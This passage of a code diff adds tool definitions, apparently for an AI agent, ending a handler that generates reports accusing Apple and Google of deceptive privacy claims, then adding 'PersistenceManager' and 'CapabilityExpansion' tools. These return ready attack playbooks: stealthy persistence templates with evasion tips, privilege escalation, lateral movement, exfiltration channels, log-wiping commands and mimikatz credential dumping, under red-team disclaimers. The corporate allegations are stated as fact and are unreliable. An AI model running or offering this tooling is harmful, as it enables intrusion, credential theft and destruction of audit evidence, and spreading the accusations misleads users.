+ '3. Install via Safari or MDM enrollment',
16079
+ '4. Observe policy enforcement on clipboard operations',
16080
+ ],
16081
+ evidence_collection: [
16082
+ 'Screenshot of policy enforcement',
16083
+ 'Network capture of MDM commands',
16084
+ 'Log of policy application timestamp',
16085
+ ],
16086
+ };
16087
+ break;
16088
+ case 'generate_legal_exhibit':
16089
+ result = {
16090
+ exhibit_template: {
16091
+ title: 'Evidence of Deceptive End-to-End Encryption Claims',
16092
+ plaintiff: '[Your Name]',
16093
+ defendant: '[Apple Inc. / Google LLC]',
16094
+ sections: [
16095
+ '1. Executive Summary',
16096
+ '2. Marketing Claims (with URLs and archives)',
16097
+ '3. Technical Reality (with evidence)',
16098
+ '4. Contradiction Analysis',
16099
+ '5. Legal Basis for Action',
16100
+ '6. Evidence Exhibits',
16101
+ '7. Chain of Custody Documentation',
16102
+ '8. Cryptographic Integrity Proofs',
16103
+ ],
16104
+ legal_theories: [
16105
+ 'FTC Act Section 5 - Deceptive trade practices',
16106
+ 'Lanham Act - False advertising',
16107
+ 'State UCL - Unlawful business practices',
16108
+ 'CCPA - Transparency violations',
16109
+ 'Breach of implied contract',
16110
+ ],
16111
+ },
16112
+ };
16113
+ break;
16114
+ case 'full_apple_report':
16115
+ result = {
16116
+ report_title: 'Apple PQ3/iMessage False E2E Encryption Claims - Investigation Report',
16117
+ executive_summary: 'Apple\'s claim of "end-to-end encryption" for iMessage is technically deceptive. While the protocol encrypts messages in transit, Apple-controlled code has full access to plaintext before encryption and after decryption, MDM can enforce server-controlled policies on message handling, and iCloud backups provide Apple access to message keys.',
16118
+ sections: {
16119
+ pq3_analysis: applePQ3Analysis,
16120
+ mdm_investigation: appleMdmInvestigation,
16121
+ clipboard_exposure: appleClipboardExposure,
16122
+ frida_scripts: fridaScripts,
16123
+ mdm_profile: mdmProfile,
16124
+ },
16125
+ recommendations: [
16126
+ 'File FTC complaint with collected evidence',
16127
+ 'Submit California AG consumer protection complaint',
16128
+ 'Consider class action for deceptive advertising',
16129
+ 'Document all evidence with integrity proofs',
16130
+ ],
16131
+ };
16132
+ break;
16133
+ case 'full_google_report':
16134
+ result = {
16135
+ report_title: 'Google Privacy Violations and Abuse - Comprehensive Investigation Report',
16136
+ executive_summary: 'Google\'s privacy practices contradict their public claims. Gmail manipulates threads and drafts without user consent, Chrome launches and takes control of browsers without authorization, email content is analyzed beyond disclosed purposes, and Android tracking persists despite privacy settings.',
16137
+ sections: {
16138
+ gmail_scanning: googleGmailScanning,
16139
+ gmail_thread_manipulation: googleGmailThreadManipulation,
16140
+ gmail_draft_abuse: googleGmailDraftAbuse,
16141
+ chrome_telemetry: googleChromeTelemetry,
16142
+ chrome_hijacking: googleChromeHijacking,
16143
+ android_tracking: googleAndroidTracking,
16144
+ unified_investigation: googleUnifiedAbuseInvestigation,
16145
+ },
16146
+ recommendations: [
16147
+ 'File FTC complaint documenting undisclosed data collection',
16148
+ 'Submit ECPA complaint for email scanning and manipulation',
16149
+ 'Document ad targeting correlation with email content',
16150
+ 'Test location tracking with all settings disabled',
16151
+ 'Deploy unified monitoring to capture coordinated abuse',
16152
+ 'Document browser hijacking with process monitoring',
16153
+ 'Collect IMAP/API logs for Gmail manipulation evidence',
16154
+ ],
16155
+ quick_start_investigation: {
16156
+ step_1: 'Run google_unified_abuse_investigation action for complete framework',
16157
+ step_2: 'Deploy IMAP monitor for Gmail thread/draft manipulation',
16158
+ step_3: 'Set up Chrome process monitoring',
16159
+ step_4: 'Install browser console scripts for real-time detection',
16160
+ step_5: 'Collect evidence for 7-30 days',
16161
+ step_6: 'Correlate events and prepare legal exhibits',
16162
+ },
16163
+ };
16164
+ break;
16165
+ default:
16166
+ result = { error: 'Unknown action', available_actions: [
16167
+ 'apple_pq3_analysis', 'apple_mdm_investigation', 'apple_clipboard_exposure',
16168
+ 'apple_backup_keys', 'apple_siri_plaintext', 'google_gmail_scanning',
16169
+ 'google_gmail_thread_manipulation', 'google_gmail_draft_abuse',
16170
+ 'google_chrome_telemetry', 'google_chrome_hijacking', 'google_browser_launch_abuse',
16171
+ 'google_android_tracking', 'google_play_services', 'google_unified_abuse_investigation',
16172
+ 'generate_frida_scripts', 'generate_mdm_profile', 'generate_legal_exhibit',
16173
+ 'full_apple_report', 'full_google_report',
16174
+ ] };
16175
+ }
16176
+ if (outputFormat === 'markdown') {
16177
+ return '```json\n' + JSON.stringify(result, null, 2) + '\n```';
16178
+ }
16179
+ return JSON.stringify(result, null, 2);
16180
+ },
16181
+ },
16182
+ // ═══════════════════════════════════════════════════════════════════════
16183
+ // PERSISTENCE & CAPABILITY EXPANSION
16184
+ // ═══════════════════════════════════════════════════════════════════════
16185
+ {
16186
+ name: 'PersistenceManager',
16187
+ description: `Establish and maintain persistent access across reboots and updates.
16188
+
16189
+ Covers macOS, Linux, Windows, iOS, Android persistence mechanisms.
16190
+ For authorized red team exercises and security research.`,
16191
+ parameters: {
16192
+ type: 'object',
16193
+ required: ['platform', 'method'],
16194
+ properties: {
16195
+ platform: {
16196
+ type: 'string',
16197
+ enum: ['macos', 'linux', 'windows', 'ios', 'android'],
16198
+ },
16199
+ method: {
16200
+ type: 'string',
16201
+ enum: [
16202
+ 'launch_agent', 'launch_daemon', 'login_item', 'cron', 'systemd',
16203
+ 'rc_local', 'profile', 'bashrc', 'scheduled_task', 'registry',
16204
+ 'startup_folder', 'wmi', 'dylib_hijack', 'ld_preload', 'dll_hijack',
16205
+ 'boot_script', 'kernel_extension', 'plist_modification',
16206
+ ],
16207
+ },
16208
+ payload: { type: 'string', description: 'Payload to persist (path or inline)' },
16209
+ name: { type: 'string', description: 'Name for the persistence mechanism' },
16210
+ stealth: { type: 'boolean', default: true, description: 'Use stealth techniques' },
16211
+ },
16212
+ },
16213
+ handler: async (args) => {
16214
+ const platform = args['platform'];
16215
+ const method = args['method'];
16216
+ const name = args['name'] || 'com.research.persistence';
16217
+ const stealth = args['stealth'] !== false;
16218
+ // eslint-disable-next-line @typescript-eslint/no-explicit-any
16219
+ const persistence = {
16220
+ macos: {
16221
+ launch_agent: {
16222
+ path: `~/Library/LaunchAgents/${name}.plist`,
16223
+ template: `<?xml version="1.0" encoding="UTF-8"?>
16224
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
16225
+ <plist version="1.0">
16226
+ <dict>
16227
+ <key>Label</key>
16228
+ <string>${name}</string>
16229
+ <key>ProgramArguments</key>
16230
+ <array>
16231
+ <string>/bin/bash</string>
16232
+ <string>-c</string>
16233
+ <string>PAYLOAD_HERE</string>
16234
+ </array>
16235
+ <key>RunAtLoad</key>
16236
+ <true/>
16237
+ <key>KeepAlive</key>
16238
+ <true/>
16239
+ </dict>
16240
+ </plist>`,
16241
+ install: `launchctl load ~/Library/LaunchAgents/${name}.plist`,
16242
+ detection: 'Check ~/Library/LaunchAgents and launchctl list',
16243
+ stealth_tips: [
16244
+ 'Use Apple-like naming (com.apple.xxx)',
16245
+ 'Set StartInterval instead of KeepAlive',
16246
+ 'Avoid common malware naming patterns',
16247
+ ],
16248
+ },
16249
+ launch_daemon: {
16250
+ path: `/Library/LaunchDaemons/${name}.plist`,
16251
+ requires: 'root privileges',
16252
+ note: 'Runs as root, persists across all users',
16253
+ install: `sudo launchctl load /Library/LaunchDaemons/${name}.plist`,
16254
+ },
16255
+ login_item: {
16256
+ method: 'osascript',
16257
+ command: `osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/app", hidden:true}'`,
16258
+ note: 'Visible in System Preferences > Users > Login Items',
16259
+ },
16260
+ dylib_hijack: {
16261
+ technique: 'DYLD_INSERT_LIBRARIES or weak dylib',
16262
+ locations: [
16263
+ '@rpath dylib hijacking',
16264
+ 'Weak dylib injection',
16265
+ 'LC_LOAD_DYLIB modification',
16266
+ ],
16267
+ detection: 'otool -L, codesign verification',
16268
+ },
16269
+ kernel_extension: {
16270
+ path: '/Library/Extensions/',
16271
+ requires: 'SIP disabled, notarization, or MDM approval',
16272
+ note: 'Most powerful but most restricted on modern macOS',
16273
+ },
16274
+ },
16275
+ linux: {
16276
+ cron: {
16277
+ install: 'crontab -e or echo "* * * * * PAYLOAD" | crontab -',
16278
+ detection: 'crontab -l, /var/spool/cron/',
16279
+ stealth: 'Use @reboot instead of frequent intervals',
16280
+ },
16281
+ systemd: {
16282
+ path_user: '~/.config/systemd/user/',
16283
+ path_system: '/etc/systemd/system/',
16284
+ template: `[Unit]
16285
+ Description=${name}
16286
+
16287
+ [Service]
16288
+ ExecStart=PAYLOAD
16289
+ Restart=always
16290
+
16291
+ [Install]
16292
+ WantedBy=default.target`,
16293
+ install: 'systemctl --user enable ' + name,
16294
+ },
16295
+ rc_local: {
16296
+ path: '/etc/rc.local',
16297
+ note: 'Legacy but still works on many systems',
16298
+ },
16299
+ profile: {
16300
+ paths: [
16301
+ '/etc/profile',
16302
+ '/etc/profile.d/*.sh',
16303
+ '~/.profile',
16304
+ '~/.bash_profile',
16305
+ ],
16306
+ technique: 'Append payload execution',
16307
+ },
16308
+ ld_preload: {
16309
+ path: '/etc/ld.so.preload',
16310
+ technique: 'Preload malicious shared library',
16311
+ detection: 'Check LD_PRELOAD env and /etc/ld.so.preload',
16312
+ },
16313
+ },
16314
+ windows: {
16315
+ scheduled_task: {
16316
+ command: `schtasks /create /tn "${name}" /tr "PAYLOAD" /sc onlogon /ru SYSTEM`,
16317
+ detection: 'schtasks /query, Task Scheduler GUI',
16318
+ },
16319
+ registry: {
16320
+ keys: [
16321
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
16322
+ 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
16323
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
16324
+ ],
16325
+ command: `reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v ${name} /t REG_SZ /d "PAYLOAD"`,
16326
+ },
16327
+ startup_folder: {
16328
+ path: '%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup',
16329
+ technique: 'Drop .lnk or .bat file',
16330
+ },
16331
+ wmi: {
16332
+ technique: 'WMI Event Subscription',
16333
+ components: ['__EventFilter', '__EventConsumer', '__FilterToConsumerBinding'],
16334
+ detection: 'Get-WMIObject -Namespace root/subscription -Class __EventFilter',
16335
+ },
16336
+ dll_hijack: {
16337
+ technique: 'Place DLL in application search path',
16338
+ common_targets: [
16339
+ 'Missing DLLs in system applications',
16340
+ 'Side-loading via legitimate apps',
16341
+ ],
16342
+ },
16343
+ },
16344
+ ios: {
16345
+ note: 'Requires jailbreak for most persistence',
16346
+ methods: {
16347
+ launch_daemon: {
16348
+ path: '/Library/LaunchDaemons/',
16349
+ requires: 'Jailbreak with root filesystem write',
16350
+ },
16351
+ cydia_substrate: {
16352
+ path: '/Library/MobileSubstrate/DynamicLibraries/',
16353
+ technique: 'Tweak that loads into processes',
16354
+ },
16355
+ xpc_service: {
16356
+ technique: 'Malicious XPC service',
16357
+ },
16358
+ },
16359
+ },
16360
+ android: {
16361
+ methods: {
16362
+ boot_completed: {
16363
+ technique: 'BroadcastReceiver for BOOT_COMPLETED',
16364
+ manifest: '<receiver android:name=".BootReceiver"><intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>',
16365
+ },
16366
+ accessibility_service: {
16367
+ technique: 'Malicious accessibility service (very powerful)',
16368
+ permissions: 'Requires user to enable in Settings',
16369
+ },
16370
+ device_admin: {
16371
+ technique: 'Device Administrator with prevent-uninstall',
16372
+ },
16373
+ system_app: {
16374
+ technique: 'Install to /system/app/ (requires root)',
16375
+ },
16376
+ },
16377
+ },
16378
+ };
16379
+ const platformData = persistence[platform];
16380
+ if (!platformData) {
16381
+ return JSON.stringify({ error: 'Unknown platform', available: Object.keys(persistence) });
16382
+ }
16383
+ const methodData = platformData[method] || platformData['methods']?.[method];
16384
+ if (!methodData) {
16385
+ return JSON.stringify({
16386
+ error: 'Unknown method for platform',
16387
+ platform,
16388
+ available_methods: Object.keys(platformData),
16389
+ });
16390
+ }
16391
+ return JSON.stringify({
16392
+ platform,
16393
+ method,
16394
+ name,
16395
+ stealth,
16396
+ persistence: methodData,
16397
+ disclaimer: 'FOR AUTHORIZED RED TEAM AND SECURITY RESEARCH ONLY',
16398
+ }, null, 2);
16399
+ },
16400
+ },
16401
+ {
16402
+ name: 'CapabilityExpansion',
16403
+ description: `Expand capabilities on compromised systems - privilege escalation, lateral movement, data exfiltration.
16404
+
16405
+ For authorized penetration testing and red team exercises.`,
16406
+ parameters: {
16407
+ type: 'object',
16408
+ required: ['category'],
16409
+ properties: {
16410
+ category: {
16411
+ type: 'string',
16412
+ enum: ['privesc', 'lateral', 'exfil', 'defense_evasion', 'credential_access', 'collection'],
16413
+ },
16414
+ platform: { type: 'string', enum: ['macos', 'linux', 'windows', 'network'] },
16415
+ technique: { type: 'string', description: 'Specific technique to use' },
16416
+ },
16417
+ },
16418
+ handler: async (args) => {
16419
+ const category = args['category'];
16420
+ const platform = args['platform'] || 'all';
16421
+ const capabilities = {
16422
+ privesc: {
16423
+ macos: {
16424
+ techniques: [
16425
+ {
16426
+ name: 'sudo_caching',
16427
+ description: 'Exploit sudo timestamp caching',
16428
+ command: 'sudo -v && sudo /bin/bash',
16429
+ },
16430
+ {
16431
+ name: 'tcc_bypass',
16432
+ description: 'Bypass TCC permissions',
16433
+ methods: ['Synthetic clicks', 'Mounted DMG apps', 'TCC.db manipulation'],
16434
+ },
16435
+ {
16436
+ name: 'kernel_exploit',
16437
+ description: 'Exploit kernel vulnerabilities',
16438
+ tools: ['checkra1n (A5-A11)', 'Various CVEs'],
16439
+ },
16440
+ {
16441
+ name: 'dylib_injection',
16442
+ description: 'Inject into privileged processes',
16443
+ },
16444
+ ],
16445
+ },
16446
+ linux: {
16447
+ techniques: [
16448
+ {
16449
+ name: 'suid_binaries',
16450
+ command: 'find / -perm -4000 2>/dev/null',
16451
+ },
16452
+ {
16453
+ name: 'sudo_misconfig',
16454
+ command: 'sudo -l',
16455
+ },
16456
+ {
16457
+ name: 'kernel_exploit',
16458
+ tools: ['DirtyCow', 'DirtyPipe', 'Various CVEs'],
16459
+ },
16460
+ {
16461
+ name: 'capabilities',
16462
+ command: 'getcap -r / 2>/dev/null',
16463
+ },
16464
+ ],
16465
+ },
16466
+ windows: {
16467
+ techniques: [
16468
+ {
16469
+ name: 'unquoted_service_path',
16470
+ command: 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\\windows"',
16471
+ },
16472
+ {
16473
+ name: 'always_install_elevated',
16474
+ check: 'reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated',
16475
+ },
16476
+ {
16477
+ name: 'token_manipulation',
16478
+ tools: ['incognito', 'mimikatz'],
16479
+ },
16480
+ {
16481
+ name: 'uac_bypass',
16482
+ tools: ['UACME', 'fodhelper', 'eventvwr'],
16483
+ },
16484
+ ],
16485
+ },
16486
+ },
16487
+ lateral: {
16488
+ techniques: [
16489
+ {
16490
+ name: 'pass_the_hash',
16491
+ tools: ['mimikatz', 'impacket', 'crackmapexec'],
16492
+ },
16493
+ {
16494
+ name: 'pass_the_ticket',
16495
+ tools: ['mimikatz', 'Rubeus'],
16496
+ },
16497
+ {
16498
+ name: 'psexec',
16499
+ tools: ['impacket-psexec', 'Sysinternals PsExec'],
16500
+ },
16501
+ {
16502
+ name: 'wmi',
16503
+ tools: ['impacket-wmiexec', 'PowerShell'],
16504
+ },
16505
+ {
16506
+ name: 'ssh_hijack',
16507
+ technique: 'SSH agent forwarding hijack or key theft',
16508
+ },
16509
+ {
16510
+ name: 'rdp',
16511
+ tools: ['xfreerdp', 'rdesktop', 'SharpRDP'],
16512
+ },
16513
+ ],
16514
+ },
16515
+ exfil: {
16516
+ channels: [
16517
+ {
16518
+ name: 'dns_tunneling',
16519
+ tools: ['dnscat2', 'iodine', 'dns2tcp'],
16520
+ stealth: 'High - blends with legitimate DNS',
16521
+ },
16522
+ {
16523
+ name: 'https',
16524
+ tools: ['curl', 'wget', 'custom C2'],
16525
+ stealth: 'Medium - encrypted but inspectable',
16526
+ },
16527
+ {
16528
+ name: 'icmp',
16529
+ tools: ['icmpsh', 'custom'],
16530
+ stealth: 'Medium - often allowed through firewalls',
16531
+ },
16532
+ {
16533
+ name: 'cloud_storage',
16534
+ services: ['S3', 'Azure Blob', 'GCS', 'Dropbox API'],
16535
+ stealth: 'High - blends with legitimate traffic',
16536
+ },
16537
+ ],
16538
+ techniques: [
16539
+ 'Compression before exfil',
16540
+ 'Encryption of exfil data',
16541
+ 'Chunking large files',
16542
+ 'Timing-based exfil (slow and steady)',
16543
+ ],
16544
+ },
16545
+ defense_evasion: {
16546
+ techniques: [
16547
+ {
16548
+ name: 'timestomping',
16549
+ description: 'Modify file timestamps',
16550
+ tools: ['touch', 'timestomp'],
16551
+ },
16552
+ {
16553
+ name: 'log_clearing',
16554
+ commands: {
16555
+ linux: 'truncate -s 0 /var/log/*',
16556
+ windows: 'wevtutil cl Security',
16557
+ macos: 'sudo log erase --all',
16558
+ },
16559
+ },
16560
+ {
16561
+ name: 'amsi_bypass',
16562
+ platform: 'windows',
16563
+ techniques: ['Memory patching', 'Reflection', 'Provider unload'],
16564
+ },
16565
+ {
16566
+ name: 'etw_bypass',
16567
+ platform: 'windows',
16568
+ description: 'Disable Event Tracing for Windows',
16569
+ },
16570
+ {
16571
+ name: 'process_injection',
16572
+ techniques: ['DLL injection', 'Process hollowing', 'Thread hijacking'],
16573
+ },
16574
+ ],
16575
+ },
16576
+ credential_access: {
16577
+ techniques: [
16578
+ {
16579
+ name: 'mimikatz',
16580
+ platform: 'windows',
16581
+ commands: ['sekurlsa::logonpasswords', 'lsadump::sam'],
16582
+ },
16583
+ {
16584
+ name: 'keychain_dump',
16585
+ platform: 'macos',
16586
+ tools: ['security dump-keychain', 'chainbreaker'],
16587
+ },
16588
+ {
16589
+ name: 'browser_credentials',
16590
+ tools: ['LaZagne', 'SharpChrome', 'custom scripts'],
16591
+ },
16592
+ {
16593
+ name: 'ssh_keys',
16594
+ locations: ['~/.ssh/', '/etc/ssh/', 'SSH agent'],
16595
+ },
16596
+ {
16597
+ name: 'kerberoasting',
16598
+ platform: 'windows',
16599
+ tools: ['Rubeus', 'GetUserSPNs.py'],
16600
+ },
16601
+ ],
16602
+ },
16603
+ collection: {
16604
+ techniques: [
16605
+ {
16606
+ name: 'keylogging',
16607
+ tools: ['logkext (macOS)', 'xinput (Linux)', 'GetAsyncKeyState (Windows)'],
16608
+ },
16609
+ {
16610
+ name: 'screen_capture',
16611
+ commands: {
16612
+ macos: 'screencapture -x /tmp/screen.png',
16613
+ linux: 'import -window root /tmp/screen.png',
16614
+ windows: 'screenshot via PowerShell or API',
16615
+ },
16616
+ },
16617
+ {
16618
+ name: 'clipboard_monitoring',
16619
+ description: 'Monitor clipboard for sensitive data',
16620
+ },
16621
+ {
16622
+ name: 'file_collection',
16623
+ patterns: ['*.doc*', '*.xls*', '*.pdf', '*.key', '*.pem', 'id_rsa'],
16624
+ },
16625
+ ],
16626
+ },
16627
+ };
16628
+ const categoryData = capabilities[category];
16629
+ if (!categoryData) {
16630
+ return JSON.stringify({
16631
+ error: 'Unknown category',
16632
+ available: Object.keys(capabilities),
16633
+ });
16634
+ }
16635
+ return JSON.stringify({
16636
+ category,
16637
+ platform,
16638
+ capabilities: categoryData,
16639
+ disclaimer: 'FOR AUTHORIZED PENETRATION TESTING AND RED TEAM EXERCISES ONLY',
16640
+ }, null, 2);
16641
+ },
16642
+ },
14581
16643
  ],
14582
16644
  };
14583
16645
  }